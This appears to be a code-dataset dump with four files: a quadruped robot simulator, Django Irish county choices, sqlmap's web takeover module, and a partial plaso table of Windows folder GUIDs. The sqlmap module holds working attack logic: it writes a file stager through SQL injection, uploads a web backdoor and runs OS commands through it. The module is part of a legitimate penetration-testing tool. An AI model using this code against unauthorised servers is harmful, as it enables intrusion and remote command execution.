repo_name stringlengths 5 100 | path stringlengths 4 294 | copies stringclasses 990 values | size stringlengths 4 7 | content stringlengths 666 1M | license stringclasses 15 values |
|---|---|---|---|---|---|
MartinStolle/quadruped-walking-gaits | tags/Simulation/Source Code/Robot.py | 2 | 20315 | '''
Author: Martin Stolle
Description: Builds and controls the Robot
'''
import ode
from visual import vector, pi, sphere, points
import vpyode
import numpy
from random import gauss, uniform
from math import *
import threading
import Constants as const
from Graph import Graph
class Robot:
    '''Builds the quadruped robot (central body, four femurs, four tibias and
    their hinge joints) inside the given ODE world and drives its walking and
    turning gaits.

    Note: the file targets Python 2 (old-style class, vpython `visual`
    module); print calls below use the single-argument form that is valid in
    both Python 2 and 3.
    '''

    # Gait tables: one tuple per phase (self.check cycles 0..7); each phase
    # is a sequence of (target angle in degrees, joint index) commands that
    # are issued together.  Joint indices follow creation order in
    # createJoints(): for leg i, index 2*i is the femur/body hinge and
    # 2*i+1 the tibia/femur hinge.
    _FORWARD_GAIT = (
        ((90, 3), (270, 2)),
        ((270, 3), (90, 0)),
        ((90, 7), (90, 6)),
        ((270, 7), (270, 4)),
        ((90, 5), (90, 4)),
        ((270, 5), (270, 6)),
        ((90, 1), (270, 0)),
        ((270, 1), (90, 2)),
    )
    _BACKWARD_GAIT = (
        ((90, 1), (90, 0)),
        ((270, 1), (270, 2)),
        ((90, 5), (270, 4)),
        ((270, 5), (90, 6)),
        ((90, 7), (270, 6)),
        ((270, 7), (90, 4)),
        ((90, 3), (90, 2)),
        ((270, 3), (270, 0)),
    )
    _TURN_LEFT_GAIT = (
        ((90, 3), (270, 2)),
        ((270, 3), (90, 0)),
        ((90, 5), (270, 4)),
        ((270, 5), (90, 6)),
        ((90, 7), (270, 6)),
        ((270, 7), (90, 4)),
        ((90, 1), (270, 0)),
        ((270, 1), (90, 2)),
    )
    _TURN_RIGHT_GAIT = (
        ((90, 1), (90, 0)),
        ((270, 1), (270, 2)),
        ((90, 7), (90, 6)),
        ((270, 7), (270, 4)),
        ((90, 5), (90, 4)),
        ((270, 5), (270, 6)),
        ((90, 3), (90, 2)),
        ((270, 3), (270, 0)),
    )

    def __init__(self, world, space, density):
        '''world/space: ODE simulation handles; density: body material density.'''
        self.world = world
        self.space = space
        self.density = density
        # Leg segment dimensions, tunable at runtime through the set* methods
        self.femurHeight = const.femurHeight
        self.femurWidth = const.femurWidth
        self.femurLength = const.femurLength
        self.tibiaHeight = const.tibiaHeight
        self.tibiaWidth = const.tibiaWidth
        self.tibiaLength = const.tibiaLength
        self.densityFemur = 10
        self.densityTibia = 10
        self.FMax = 10000          # maximum joint motor force/torque
        self.totalMass = 0.0
        self.bodyExist = True
        self.showLabels = True
        self.center = (0, 0, 0)
        self.joints = []           # list of [hinge joint, anchor marker] pairs
        self.check = 0             # current gait phase (0..7), shared by all gaits
        self.checkBack = 0
        self.centerRobot = True
        self.minDeg = const.minDeg
        self.maxDeg = const.maxDeg
        self.maxTibiaDeg = const.tibiaDeg
        self.time = 0.5            # seconds between gait phases
        # means how many percent of the body do have the density
        # like human body where only 90% is water
        self.bodyCoverage = 1.0
        self.graph = Graph()
        self.graphVal = []         # (x, y) samples plotted by refreshGraph()

    def setLegs(self):
        '''Adds some legs to our robot'''
        self.femur = []
        self.tibia = []
        for _ in range(const.numLegs):
            self.femur.append(self.createBody(self.femurLength,
                                              self.femurHeight,
                                              self.femurWidth,
                                              self.densityFemur))
        for _ in range(const.numLegs):
            self.tibia.append(self.createBody(self.tibiaLength,
                                              self.tibiaHeight,
                                              self.tibiaWidth,
                                              self.densityTibia))

    def createBody(self, lx, ly, lz, density):
        '''Creates the geom, body and visual box; accumulates self.totalMass.'''
        body = vpyode.GDMFrameBody(self.world)
        element = vpyode.GDMElement()
        element.DefineBox((density*self.bodyCoverage), lx, ly, lz)
        body.AddGDMElement('Box', element)
        self.totalMass += body.getMass().mass
        return body

    def dropRobot(self):
        '''Drops the whole body'''
        self.body = self.createBody(const.bodyLength,
                                    const.bodyHeight,
                                    const.bodyWidth,
                                    self.density)
        self.setLegs()
        self.dropLegs()
        self.dropBody()
        self.createJoints()

    def createJoints(self):
        '''Create the connections between the legs and body
        Note: Actually we do not set some of the legs to 90deg. The limitation
        of the angle stops before we can reach that angle. The reason for
        using that approach is that the force used for reaching that angle
        is much higher that way.'''
        self.joints = []
        for i in range(const.numLegs):
            fX = const.bodyLength/2
            fY = const.bodyHeight/2+const.Height
            fZ = const.bodyWidth/2
            tX = const.bodyLength/2
            tY = const.bodyHeight/2+const.Height
            tZ = const.bodyWidth/2+self.femurWidth/2  # +const.tibiaWidth/2
            # Per leg: one femur/body hinge (vertical axis) followed by one
            # tibia/femur hinge (horizontal axis); signs mirror the leg corner.
            if i == 0:
                self.addHingeJoint(self.femur[i], self.body, (fX, fY, fZ),
                                   (0, -1, 0), -0, self.minDeg, self.maxDeg)
                self.addHingeJoint(self.tibia[i], self.femur[i], (tX, tY, tZ),
                                   (1, 0, 0), const.maxAngle, -0.01,
                                   self.maxTibiaDeg)
            elif i == 1:
                self.addHingeJoint(self.femur[i], self.body, (-fX, fY, fZ),
                                   (0, -1, 0), 0, self.maxDeg, self.minDeg)
                self.addHingeJoint(self.tibia[i], self.femur[i], (-tX, tY, tZ),
                                   (1, 0, 0), const.maxAngle, -0.01,
                                   self.maxTibiaDeg)
            elif i == 2:
                self.addHingeJoint(self.femur[i], self.body, (-fX, fY, -fZ),
                                   (0, -1, 0), -const.maxAngle,
                                   self.minDeg, self.maxDeg)
                self.addHingeJoint(self.tibia[i], self.femur[i], (-tX, tY, -tZ),
                                   (-1, 0, 0), const.maxAngle, -0.01,
                                   self.maxTibiaDeg)
            elif i == 3:
                self.addHingeJoint(self.femur[i], self.body, (fX, fY, -fZ),
                                   (0, -1, 0), const.maxAngle,
                                   self.maxDeg, self.minDeg)
                self.addHingeJoint(self.tibia[i], self.femur[i], (tX, tY, -tZ),
                                   (-1, 0, 0), const.maxAngle, -0.01,
                                   self.maxTibiaDeg)

    def addFixedJoint(self, body1, body2):
        '''Rigidly glues body1 to body2 and returns the joint.'''
        joint = ode.FixedJoint(self.world)
        joint.attach(body1, body2)
        joint.setFixed()
        return joint

    def addHingeJoint(self, body1, body2, anchor, axis, degree=0, loStop=0.2, hiStop=0.2):
        '''Creates a powered hinge joint between body1 and body2.

        loStop/hiStop are fractions of pi used as angle limits; degree is the
        initial motor velocity expressed in degrees.'''
        joint = ode.HingeJoint(self.world)
        joint.attach(body1, body2)
        joint.setAnchor(anchor)
        joint.setAxis(axis)
        joint.setParam(ode.ParamLoStop, -pi * hiStop)  # must be smaller than -pi
        joint.setParam(ode.ParamHiStop, pi * loStop)   # must be smaller than pi
        joint.setParam(ode.ParamFMax, self.FMax)
        joint.setParam(ode.ParamVel, self.DegreeToRadian(degree))
        joint.addTorque(self.FMax)
        self.joints.append([joint, self.visualizeHinge(anchor)])

    def setAngle(self, val, jNr):
        '''sets the angle of a specific joint (180 is the neutral position)'''
        val -= 180
        self.joints[jNr][0].setParam(ode.ParamVel, self.DegreeToRadian(val))

    def visualizeHinge(self, anchor):
        '''shows a point where the anchor point of the joint is'''
        #points(pos=[anchor], size=5, color=(1,0,0))
        return sphere(pos=anchor, radius=0.3, color=(0, 0, 1))

    def removeJointVisuals(self):
        '''Hides and discards every joint anchor marker.'''
        for joint in self.joints:
            joint[1].visible = False
            del joint[1]

    def refreshJoints(self):
        '''Moves every anchor marker to its joint's current anchor position.'''
        for joint in self.joints:
            joint[1].pos = joint[0].getAnchor2()

    def dropLegs(self):
        '''Drops the legs of the robot'''
        # (x, z) sign per leg corner: front-left, back-left, back-right, front-right
        signs = ((1, 1), (-1, 1), (-1, -1), (1, -1))
        fX = const.bodyLength/2
        fY = const.bodyHeight/2+const.Height
        fZ = const.bodyWidth/2+self.femurWidth/2
        for leg, (sx, sz) in zip(self.femur, signs):
            leg.setPosition((sx*fX, fY, sz*fZ))
        tX = const.bodyLength/2
        tY = const.bodyHeight/2-self.femurHeight/2-self.tibiaHeight/2+const.Height
        tZ = const.bodyWidth/2+self.femurWidth+self.tibiaWidth/2
        for leg, (sx, sz) in zip(self.tibia, signs):
            leg.setPosition((sx*tX, tY, sz*tZ))

    def dropBody(self):
        '''drops the main body of the robot'''
        self.body.setPosition((0, const.bodyHeight/2+const.Height, 0))

    def refreshRobot(self, lBody, lFemur=None, lTibia=None):
        '''Refreshes the position of the labels and camera'''
        self.refreshBody(lBody)
        #self.refreshLegs(lTibia, lFemur)
        self.refreshJoints()

    def refreshBody(self, lBody):
        '''Refreshes the label position and the camera of the center body'''
        self.body.UpdateDisplay()
        x, y, z = self.body.getPosition()
        self.center = (x, y, z)
        self.refreshGraph((x, y))
        if self.showLabels:
            lBody.pos = (x, y, z)
            lBody.text = '%.2f, %.2f, %.2f, %.1f kg' % (x, y, z, self.totalMass)

    def refreshGraph(self, val):
        '''Appends *val* to the plotted series, restarting the series once it
        grows beyond const.maxSize so the plot stays bounded.'''
        if len(self.graphVal) > const.maxSize:
            # Fixed: previously the overflow branch discarded *val* and
            # skipped the plot update for that step.
            self.graphVal = []
        self.graphVal.append(val)
        self.graph.plotData(self.graphVal)

    def refreshLegs(self, lTibia, lFemur):
        '''Refreshes the position of the labels
        NOTE(review): each loop overwrites the single label, so only the last
        femur/tibia position is shown -- confirm whether per-leg labels were
        intended (this method is currently commented out at its call site).'''
        for i in range(len(self.femur)):
            x, y, z = self.femur[i].getPosition()
            lFemur.pos = (x, y, z)
        for i in range(len(self.tibia)):
            x, y, z = self.tibia[i].getPosition()
            lTibia.pos = (x, y, z)

    def scalp(self, vec, scal):
        '''geometric utility functions - from ODE example (scales in place)'''
        vec[0] *= scal
        vec[1] *= scal
        vec[2] *= scal

    def length(self, vec):
        '''geometric utility functions - from ODE example'''
        return sqrt(vec[0]**2 + vec[1]**2 + vec[2]**2)

    def DegreeToRadian(self, deg):
        '''geometric utility functions - from ODE example '''
        return float(deg)/180.0 * pi

    def RadianToDegree(self, rad):
        '''geometric utility functions - from ODE example '''
        return rad/pi * 180

    def pushRobot(self):
        '''Applies a force to the robot - from ODE Example'''
        l = self.body.getPosition()
        d = self.length(l)
        a = max(0, 800000*(1.0-0.2*d*d))
        # NOTE(review): the x component below uses l[1]; the upstream ODE
        # example uses l[0]/4 here -- confirm before changing. Kept as-is.
        l = [l[1] / 4, l[1], l[2] / 4]
        self.scalp(l, a / self.length(l))
        for leg in self.femur:
            leg.addForce(l)
        for leg in self.tibia:
            leg.addForce(l)
        self.body.addRelForce(l)
        print('Applied Force: %s' % l)

    def setDensity(self, val):
        '''Sets the density of the robot, considering the percentage it is
        covered with the material'''
        self.density = (float(val)*self.bodyCoverage)

    def setFemurDensity(self, val):
        '''Sets the density of the femur, considering the percentage it is
        covered with the material'''
        self.densityFemur = (float(val)*self.bodyCoverage)

    def setTibiaDensity(self, val):
        '''Sets the density of the tibia, considering the percentage it is
        covered with the material'''
        self.densityTibia = (float(val)*self.bodyCoverage)

    def setFemurLength(self, val):
        # Fixed: previously assigned self.femurHeight by mistake.
        self.femurLength = float(val)

    def setFemurHeight(self, val):
        self.femurHeight = float(val)

    def setFemurWidth(self, val):
        self.femurWidth = float(val)

    def setTibiaLength(self, val):
        self.tibiaLength = float(val)

    def setTibiaHeight(self, val):
        self.tibiaHeight = float(val)

    def setTibiaWidth(self, val):
        self.tibiaWidth = float(val)

    def setMinDeg(self, val):
        self.minDeg = float(val)

    def setMaxDeg(self, val):
        self.maxDeg = float(val)

    def setTibiaMaxDeg(self, val):
        self.maxTibiaDeg = float(val)

    def setBodyCoverage(self, val):
        '''Percentage of the body using the material'''
        self.bodyCoverage = float(val)
        print('Bodyshare = %2.1f percent' % (float(val)*100))

    def setFMax(self, val):
        '''The maximum force or torque that the motor will use to achieve the
        desired velocity. Must be greater than zero. 0 = motor off'''
        for joint in self.joints:
            joint[0].setParam(ode.ParamFMax, float(val))
        self.FMax = float(val)
        print('Torque = %1.2f' % float(val))

    def bodyExists(self):
        '''Returns the boolean if the robot body exists'''
        return self.bodyExist

    def dropAgain(self):
        '''Removes the old body and readds it to its initial position'''
        self.bodyExist = False
        self.check = 0
        self.totalMass = 0.0
        for key in self.body.GetElementKeys():
            self.body.RemoveElement(key)
        for leg in self.femur:
            for key in leg.GetElementKeys():
                leg.RemoveElement(key)
        for leg in self.tibia:
            for key in leg.GetElementKeys():
                leg.RemoveElement(key)
        self.removeJointVisuals()
        self.dropRobot()
        print('total mass is %.1f kg' % self.totalMass)
        self.bodyExist = True

    def _runGait(self, gait, repeat):
        '''Executes phase self.check of *gait*; schedules *repeat* via a
        timer for every phase except the last, which rewinds to phase 0.'''
        phase = self.check
        if not 0 <= phase < len(gait):
            # Out-of-range phase: mirror the old elif-chain, which did nothing.
            return
        if phase < len(gait) - 1:
            t = threading.Timer(self.time, repeat)
            t.start()
            self.check += 1
        else:
            self.check = 0
        for degree, jointNr in gait[phase]:
            self.setAngle(degree, jointNr)

    def moveForward(self):
        '''Advances the forward-walking gait by one phase.'''
        self._runGait(self._FORWARD_GAIT, self.moveForward)

    def moveBackward(self):
        '''Advances the backward-walking gait by one phase.'''
        self._runGait(self._BACKWARD_GAIT, self.moveBackward)

    def turnLeft(self):
        '''Advances the turn-left gait by one phase.'''
        self._runGait(self._TURN_LEFT_GAIT, self.turnLeft)

    def turnRight(self):
        '''Advances the turn-right gait by one phase.'''
        self._runGait(self._TURN_RIGHT_GAIT, self.turnRight)
noslenfa/tdjangorest | uw/lib/python2.7/site-packages/django/contrib/localflavor/ie/ie_counties.py | 503 | 1127 | """
Sources:
Irish Counties: http://en.wikipedia.org/wiki/Counties_of_Ireland
"""
from django.utils.translation import ugettext_lazy as _
# Choice pairs for Irish counties: (slug, lazily-translated display name).
# Every county name is a single word, so the stored value is simply the
# lower-cased display name.
IE_COUNTY_CHOICES = tuple(
    (county.lower(), _(county))
    for county in (
        'Antrim', 'Armagh', 'Carlow', 'Cavan', 'Clare', 'Cork', 'Derry',
        'Donegal', 'Down', 'Dublin', 'Fermanagh', 'Galway', 'Kerry',
        'Kildare', 'Kilkenny', 'Laois', 'Leitrim', 'Limerick', 'Longford',
        'Louth', 'Mayo', 'Meath', 'Monaghan', 'Offaly', 'Roscommon',
        'Sligo', 'Tipperary', 'Tyrone', 'Waterford', 'Westmeath',
        'Wexford', 'Wicklow',
    )
)
| apache-2.0 |
V11/volcano | server/sqlmap/lib/takeover/web.py | 1 | 14805 | #!/usr/bin/env python
"""
Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
import urlparse
import os
import re
import StringIO
from tempfile import mkstemp
from extra.cloak.cloak import decloak
from lib.core.agent import agent
from lib.core.common import arrayizeValue
from lib.core.common import Backend
from lib.core.common import extractRegexResult
from lib.core.common import getAutoDirectories
from lib.core.common import getManualDirectories
from lib.core.common import getPublicTypeMembers
from lib.core.common import getSQLSnippet
from lib.core.common import getUnicode
from lib.core.common import ntToPosixSlashes
from lib.core.common import isTechniqueAvailable
from lib.core.common import isWindowsDriveLetterPath
from lib.core.common import normalizePath
from lib.core.common import posixToNtSlashes
from lib.core.common import randomInt
from lib.core.common import randomStr
from lib.core.common import readInput
from lib.core.common import singleTimeWarnMessage
from lib.core.convert import hexencode
from lib.core.convert import utf8encode
from lib.core.data import conf
from lib.core.data import kb
from lib.core.data import logger
from lib.core.data import paths
from lib.core.enums import DBMS
from lib.core.enums import OS
from lib.core.enums import PAYLOAD
from lib.core.enums import WEB_API
from lib.core.exception import SqlmapNoneDataException
from lib.core.settings import BACKDOOR_RUN_CMD_TIMEOUT
from lib.core.settings import EVENTVALIDATION_REGEX
from lib.core.settings import VIEWSTATE_REGEX
from lib.request.connect import Connect as Request
from thirdparty.oset.pyoset import oset
class Web:
    """
    This class defines web-oriented OS takeover functionalities for
    plugins.
    """

    def __init__(self):
        # Every attribute below is populated lazily by webInit(); until then
        # the takeover helpers treat the web channel as unavailable.
        self.webApi = None
        self.webBaseUrl = None
        self.webBackdoorUrl = None
        self.webBackdoorFilePath = None
        self.webStagerUrl = None
        self.webStagerFilePath = None
        self.webDirectory = None
def webBackdoorRunCmd(self, cmd):
    """Runs *cmd* through the uploaded web backdoor.

    Returns the text captured inside the first <pre> block of the response,
    or None when no backdoor is available / no output could be parsed.
    """
    if self.webBackdoorUrl is None:
        return None

    if not cmd:
        cmd = conf.osCmd

    cmdUrl = "%s?cmd=%s" % (self.webBackdoorUrl, cmd)
    page, _, _ = Request.getPage(url=cmdUrl, direct=True, silent=True, timeout=BACKDOOR_RUN_CMD_TIMEOUT)

    output = None
    if page is not None:
        match = re.search("<pre>(.+?)</pre>", page, re.I | re.S)
        if match:
            output = match.group(1)

    return output
def webUpload(self, destFileName, directory, stream=None, content=None, filepath=None):
    """Uploads a file through the web file stager.

    The payload may be supplied as an open *stream*, a raw *content* string,
    or a local *filepath* (paths ending in '_' are stored cloaked on disk and
    get decloaked first). Returns the stager upload result.
    """
    if filepath is not None:
        if filepath.endswith('_'):
            content = decloak(filepath)  # cloaked file
        else:
            with open(filepath, "rb") as f:
                content = f.read()

    if content is not None:
        stream = StringIO.StringIO(content)  # string content

    return self._webFileStreamUpload(stream, destFileName, directory)
def _webFileStreamUpload(self, stream, destFileName, directory):
    """Pushes *stream* to the remote *directory* via the web file stager as
    *destFileName*. Returns True on confirmed upload, False otherwise."""
    stream.seek(0)  # Rewind

    try:
        setattr(stream, "name", destFileName)
    except TypeError:
        pass

    # Without a recognized web API there is no stager to talk to.
    if self.webApi not in getPublicTypeMembers(WEB_API, True):
        logger.error("sqlmap hasn't got a web backdoor nor a web file stager for %s" % self.webApi)
        return False

    multipartParams = {
        "upload": "1",
        "file": stream,
        "uploadDir": directory,
    }

    if self.webApi == WEB_API.ASPX:
        multipartParams['__EVENTVALIDATION'] = kb.data.__EVENTVALIDATION
        multipartParams['__VIEWSTATE'] = kb.data.__VIEWSTATE

    page = Request.getPage(url=self.webStagerUrl, multipart=multipartParams, raise404=False)

    if "File uploaded" not in page:
        warnMsg = "unable to upload the file through the web file "
        warnMsg += "stager to '%s'" % directory
        logger.warn(warnMsg)
        return False

    return True
def _webFileInject(self, fileContent, fileName, directory):
    """Writes *fileContent* to directory/fileName on the DBMS host through a
    MySQL 'LINES TERMINATED BY' INTO OUTFILE injection; returns the page."""
    outFile = ntToPosixSlashes(os.path.join(directory, fileName))
    uplQuery = getUnicode(fileContent).replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)

    query = ""

    if isTechniqueAvailable(kb.technique):
        where = kb.injection.data[kb.technique].where
        if where == PAYLOAD.WHERE.NEGATIVE:
            # Neutralize a negative WHERE by OR-ing in an always-true clause
            randInt = randomInt()
            query += "OR %d=%d " % (randInt, randInt)

    query += getSQLSnippet(DBMS.MYSQL, "write_file_limit", OUTFILE=outFile, HEXSTRING=hexencode(uplQuery))
    query = agent.prefixQuery(query)
    query = agent.suffixQuery(query)
    payload = agent.payload(newValue=query)
    page = Request.queryPage(payload)

    return page
def webInit(self):
    """
    This method is used to write a web backdoor (agent) on a writable
    remote directory within the web server document root.
    """
    # Already initialized by a previous call -- nothing to do.
    if self.webBackdoorUrl is not None and self.webStagerUrl is not None and self.webApi is not None:
        return

    self.checkDbmsOs()

    # Guess the server-side language from the URL extension, falling back to
    # ASP on Windows targets and PHP elsewhere.
    default = None
    choices = list(getPublicTypeMembers(WEB_API, True))

    for ext in choices:
        if conf.url.endswith(ext):
            default = ext
            break

    if not default:
        default = WEB_API.ASP if Backend.isOs(OS.WINDOWS) else WEB_API.PHP

    message = "which web application language does the web server "
    message += "support?\n"

    for count in xrange(len(choices)):
        ext = choices[count]
        message += "[%d] %s%s\n" % (count + 1, ext.upper(), (" (default)" if default == ext else ""))

        if default == ext:
            default = count + 1

    message = message[:-1]

    # Prompt until the user picks a valid 1-based index.
    while True:
        choice = readInput(message, default=str(default))

        if not choice.isdigit():
            logger.warn("invalid value, only digits are allowed")

        elif int(choice) < 1 or int(choice) > len(choices):
            logger.warn("invalid value, it must be between 1 and %d" % len(choices))

        else:
            self.webApi = choices[int(choice) - 1]
            break

    # Candidate writable directories: user-supplied first, then heuristics,
    # de-duplicated while preserving order.
    directories = list(arrayizeValue(getManualDirectories()))
    directories.extend(getAutoDirectories())
    directories = list(oset(directories))

    backdoorName = "tmpb%s.%s" % (randomStr(lowercase=True), self.webApi)
    backdoorContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "backdoor.%s_" % self.webApi))

    stagerName = "tmpu%s.%s" % (randomStr(lowercase=True), self.webApi)
    stagerContent = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))

    success = False

    # Try each candidate directory until a stager is reachable and a backdoor
    # answers a test command.
    for directory in directories:
        self.webStagerFilePath = ntToPosixSlashes(os.path.join(directory, stagerName))

        if success:
            break

        if not directory:
            continue

        uploaded = False
        directory = ntToPosixSlashes(normalizePath(directory))

        if not isWindowsDriveLetterPath(directory) and not directory.startswith('/'):
            directory = "/%s" % directory
        else:
            directory = directory[2:] if isWindowsDriveLetterPath(directory) else directory

        # Upload the file stager with the LIMIT 0, 1 INTO DUMPFILE method
        infoMsg = "trying to upload the file stager on '%s' " % directory
        infoMsg += "via LIMIT 'LINES TERMINATED BY' method"
        logger.info(infoMsg)
        self._webFileInject(stagerContent, stagerName, directory)

        # Probe every suffix of the directory path as a potential web root.
        for match in re.finditer('/', directory):
            self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
            self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)

            debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
            logger.debug(debugMsg)

            uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
            uplPage = uplPage or ""

            if "sqlmap file uploader" in uplPage:
                uploaded = True
                break

        # Fall-back to UNION queries file upload method
        if not uploaded:
            warnMsg = "unable to upload the file stager "
            warnMsg += "on '%s'" % directory
            singleTimeWarnMessage(warnMsg)

            if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                infoMsg = "trying to upload the file stager on '%s' " % directory
                infoMsg += "via UNION method"
                logger.info(infoMsg)

                handle, filename = mkstemp()
                os.fdopen(handle).close()  # close low level handle (causing problems later)

                with open(filename, "w+") as f:
                    _ = decloak(os.path.join(paths.SQLMAP_SHELL_PATH, "stager.%s_" % self.webApi))
                    _ = _.replace("WRITABLE_DIR", directory.replace('/', '\\\\') if Backend.isOs(OS.WINDOWS) else directory)
                    f.write(utf8encode(_))

                self.unionWriteFile(filename, self.webStagerFilePath, "text", forceCheck=True)

                for match in re.finditer('/', directory):
                    self.webBaseUrl = "%s://%s:%d%s/" % (conf.scheme, conf.hostname, conf.port, directory[match.start():].rstrip('/'))
                    self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)

                    debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
                    logger.debug(debugMsg)

                    uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
                    uplPage = uplPage or ""

                    if "sqlmap file uploader" in uplPage:
                        uploaded = True
                        break

        # Extra check - required
        if not uploaded:
            self.webBaseUrl = "%s://%s:%d/" % (conf.scheme, conf.hostname, conf.port)
            self.webStagerUrl = urlparse.urljoin(self.webBaseUrl, stagerName)

            debugMsg = "trying to see if the file is accessible from '%s'" % self.webStagerUrl
            logger.debug(debugMsg)

            uplPage, _, _ = Request.getPage(url=self.webStagerUrl, direct=True, raise404=False)
            uplPage = uplPage or ""

            if "sqlmap file uploader" not in uplPage:
                continue

        # Stager answered but the source is echoed back verbatim: the server
        # is not interpreting it, so this directory is unusable.
        if "<%" in uplPage or "<?" in uplPage:
            warnMsg = "file stager uploaded on '%s', " % directory
            warnMsg += "but not dynamically interpreted"
            logger.warn(warnMsg)
            continue

        elif self.webApi == WEB_API.ASPX:
            kb.data.__EVENTVALIDATION = extractRegexResult(EVENTVALIDATION_REGEX, uplPage)
            kb.data.__VIEWSTATE = extractRegexResult(VIEWSTATE_REGEX, uplPage)

        infoMsg = "the file stager has been successfully uploaded "
        infoMsg += "on '%s' - %s" % (directory, self.webStagerUrl)
        logger.info(infoMsg)

        if self.webApi == WEB_API.ASP:
            match = re.search(r'input type=hidden name=scriptsdir value="([^"]+)"', uplPage)

            if match:
                backdoorDirectory = match.group(1)
            else:
                continue

            # ASP backdoor needs a companion runcmd executable.
            _ = "tmpe%s.exe" % randomStr(lowercase=True)
            if self.webUpload(backdoorName, backdoorDirectory, content=backdoorContent.replace("WRITABLE_DIR", backdoorDirectory).replace("RUNCMD_EXE", _)):
                self.webUpload(_, backdoorDirectory, filepath=os.path.join(paths.SQLMAP_SHELL_PATH, 'runcmd.exe_'))
                self.webBackdoorUrl = "%s/Scripts/%s" % (self.webBaseUrl, backdoorName)
                self.webDirectory = backdoorDirectory
            else:
                continue

        else:
            if not self.webUpload(backdoorName, posixToNtSlashes(directory) if Backend.isOs(OS.WINDOWS) else directory, content=backdoorContent):
                warnMsg = "backdoor has not been successfully uploaded "
                warnMsg += "through the file stager possibly because "
                warnMsg += "the user running the web server process "
                warnMsg += "has not write privileges over the folder "
                warnMsg += "where the user running the DBMS process "
                warnMsg += "was able to upload the file stager or "
                warnMsg += "because the DBMS and web server sit on "
                warnMsg += "different servers"
                logger.warn(warnMsg)

                message = "do you want to try the same method used "
                message += "for the file stager? [Y/n] "
                getOutput = readInput(message, default="Y")

                if getOutput in ("y", "Y"):
                    self._webFileInject(backdoorContent, backdoorName, directory)
                else:
                    continue

            self.webBackdoorUrl = ntToPosixSlashes(os.path.join(self.webBaseUrl, backdoorName))
            self.webDirectory = directory

        self.webBackdoorFilePath = ntToPosixSlashes(os.path.join(directory, backdoorName))

        # Confirm command execution through the freshly planted backdoor.
        testStr = "command execution test"
        output = self.webBackdoorRunCmd("echo %s" % testStr)

        if output == "0":
            warnMsg = "the backdoor has been uploaded but required privileges "
            warnMsg += "for running the system commands are missing"
            raise SqlmapNoneDataException(warnMsg)
        elif output and testStr in output:
            infoMsg = "the backdoor has been successfully "
        else:
            infoMsg = "the backdoor has probably been successfully "

        infoMsg += "uploaded on '%s' - " % self.webDirectory
        infoMsg += self.webBackdoorUrl
        logger.info(infoMsg)

        success = True

        break
| mit |
jorik041/plaso | plaso/winnt/known_folder_ids.py | 4 | 17897 | # -*- coding: utf-8 -*-
"""This file contains the Windows NT Known Folder identifier definitions."""
# For now ignore the line too long errors.
# pylint: disable=line-too-long
# For now copied from:
# https://code.google.com/p/libfwsi/wiki/KnownFolderIdentifiers
# TODO: store these in a database or equiv.
DESCRIPTIONS = {
u'008ca0b1-55b4-4c56-b8a8-4de4b299d3be': u'Account Pictures',
u'00bcfc5a-ed94-4e48-96a1-3f6217f21990': u'Roaming Tiles',
u'0139d44e-6afe-49f2-8690-3dafcae6ffb8': u'(Common) Programs',
u'0482af6c-08f1-4c34-8c90-e17ec98b1e17': u'Public Account Pictures',
u'054fae61-4dd8-4787-80b6-090220c4b700': u'Game Explorer (Game Tasks)',
u'0762d272-c50a-4bb0-a382-697dcd729b80': u'Users (User Profiles)',
u'0ac0837c-bbf8-452a-850d-79d08e667ca7': u'Computer (My Computer)',
u'0d4c3db6-03a3-462f-a0e6-08924c41b5d4': u'History',
u'0f214138-b1d3-4a90-bba9-27cbc0c5389a': u'Sync Setup',
u'15ca69b3-30ee-49c1-ace1-6b5ec372afb5': u'Sample Playlists',
u'1777f761-68ad-4d8a-87bd-30b759fa33dd': u'Favorites',
u'18989b1d-99b5-455b-841c-ab7c74e4ddfc': u'Videos (My Video)',
u'190337d1-b8ca-4121-a639-6d472d16972a': u'Search Results (Search Home)',
u'1a6fdba2-f42d-4358-a798-b74d745926c5': u'Recorded TV',
u'1ac14e77-02e7-4e5d-b744-2eb1ae5198b7': u'System32 (System)',
u'1b3ea5dc-b587-4786-b4ef-bd1dc332aeae': u'Libraries',
u'1e87508d-89c2-42f0-8a7e-645a0f50ca58': u'Applications',
u'2112ab0a-c86a-4ffe-a368-0de96e47012e': u'Music',
u'2400183a-6185-49fb-a2d8-4a392a602ba3': u'Public Videos (Common Video)',
u'24d89e24-2f19-4534-9dde-6a6671fbb8fe': u'One Drive Documents',
u'289a9a43-be44-4057-a41b-587a76d7e7f9': u'Sync Results',
u'2a00375e-224c-49de-b8d1-440df7ef3ddc': u'Localized Resources (Directory)',
u'2b0f765d-c0e9-4171-908e-08a611b84ff6': u'Cookies',
u'2c36c0aa-5812-4b87-bfd0-4cd0dfb19b39': u'Original Images',
u'3214fab5-9757-4298-bb61-92a9deaa44ff': u'Public Music (Common Music)',
u'339719b5-8c47-4894-94c2-d8f77add44a6': u'One Drive Pictures',
u'33e28130-4e1e-4676-835a-98395c3bc3bb': u'Pictures (My Pictures)',
u'352481e8-33be-4251-ba85-6007caedcf9d': u'Internet Cache (Temporary Internet Files)',
u'374de290-123f-4565-9164-39c4925e467b': u'Downloads',
u'3d644c9b-1fb8-4f30-9b45-f670235f79c0': u'Public Downloads (Common Downloads)',
u'3eb685db-65f9-4cf6-a03a-e3ef65729f3d': u'Roaming Application Data (Roaming)',
u'43668bf8-c14e-49b2-97c9-747784d784b7': u'Sync Center (Sync Manager)',
u'48daf80b-e6cf-4f4e-b800-0e69d84ee384': u'Libraries',
u'491e922f-5643-4af4-a7eb-4e7a138d8174': u'Videos',
u'4bd8d571-6d19-48d3-be97-422220080e43': u'Music (My Music)',
u'4bfefb45-347d-4006-a5be-ac0cb0567192': u'Conflicts',
